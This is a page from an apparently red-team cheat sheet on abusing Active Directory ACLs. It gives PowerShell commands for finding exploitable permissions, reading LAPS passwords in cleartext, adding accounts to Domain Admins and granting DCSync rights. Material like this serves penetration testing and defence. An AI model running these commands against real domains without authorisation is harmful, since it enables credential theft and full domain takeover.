🕺
CheatSheets
  • Introduction
  • Getting Started With Hacking
  • VMs on Mac
  • Windows
    • Enumeration
    • Local Privilege Escalation
    • UAC Bypasses
    • Persistance
    • Networking
  • Active Directory
    • Offensive Powershell
    • Enumeration
      • BloodHound
    • Lateral Movement
    • Escalation
      • ACL Abuse
      • Kerberoasting
      • Un-Constrained Delegation
      • JEA
    • Persistance
    • Mimikatz
    • Alternate Cred Dumps
    • MSSQL
    • Defences and Bypasses
    • Setting Up a Lab
  • Red Teaming
    • Phishing Payloads
    • Cobalt Strike
    • Metasploit
    • Sliver
  • Linux
    • Networking
    • Enumeration
    • Local Privilege Escalation
    • Persistance
    • MySQL
  • Mainframes
    • HP Nonstop
    • IBM z/OS
  • Cloud
    • AWS
    • GCP
    • Azure
  • Web App
    • Tomcat
    • SQLMap
    • PHP
  • Mobile
    • Android
    • iOS
  • Exploit-Dev
    • Linux
      • Basic Stack Overflows
      • Bypassing NX (DEP)
      • Bypassing ASLR
    • Shellcode
    • Windows
  • WiFi
    • Alfa AWUS036ACH Setup
    • Aircrack-ng
Powered by GitBook
On this page
  • Enumeration
  • ReadProperty, ExtendedRight over OU / Computer Object
  • WriteProperty | Self-Membership | GenericAll over Group
  • GenericWrite | GenericAll | WriteProperty over Computer Object
  • GenericAll over User Object
  • WriteDACL over DC
  • Resources

Was this helpful?

  1. Active Directory
  2. Escalation

ACL Abuse

Enumeration

# Import
Import-Module C:\ADModule\Microsoft.ActiveDirectory.Management.dll
Import-Module C:\ADModule\ActiveDirectory\ActiveDirectory.psd1

# Get DistinguishedName
Get-ADUser -Identity USER

# Find ACLs related to that user
(Get-Acl 'AD:\CN=USER,CN=Users,DC=it,DC=gcb,DC=local').Access
Find-InterestingDomainACL -ResolveGUIDs
Invoke-ACLScanner -ResolveGUIDs

ReadProperty, ExtendedRight over OU / Computer Object

Most likely LAPS. The IdentityReferenceName can read the LAPS password in cleartext for the OU.

# Import module
Import-Module C:\AD\Tools\AdmPwd.PS\AdmPwd.PS.psd1 

# Find the OUs that can read LAPS passwords
Find-AdmPwdExtendedRights -Identity <OU>

# Once we have compromised a user that can read LAPS
Get-AdmPwdPassword -ComputerName <targetmachine>

WriteProperty | Self-Membership | GenericAll over Group

Can add members to the group 

# Add
Add-ADGroupMember -Identity "LocalAdmins" -Members USERS

# Check
Get-ADGroupMember -Identity "LocalAdmins"
Add-DomainGroupMember -Identity 'Domain Admins' -Members 'harmj0y'

GenericWrite | GenericAll | WriteProperty over Computer Object

Can perform Resource Based Constrained Delegation Attack

GenericAll over User Object

Can reset their password without knowing the old one

WriteDACL over DC

Can give DCSync privs to user

Set-ADACL -SamAccountName USER\DOMAIN DistinguishedName 'DC=techcorp,DC=local' -GUIDRight DCSync -Server techcorp.local -Verbose
Add-DomainObjectAcl -PrincipalIdentity USER -Rights DCSync

Resources

PreviousEscalationNextKerberoasting

Last updated 4 years ago

Was this helpful?

Abusing Active Directory ACLs/ACEsRed Teaming Experiments
Logo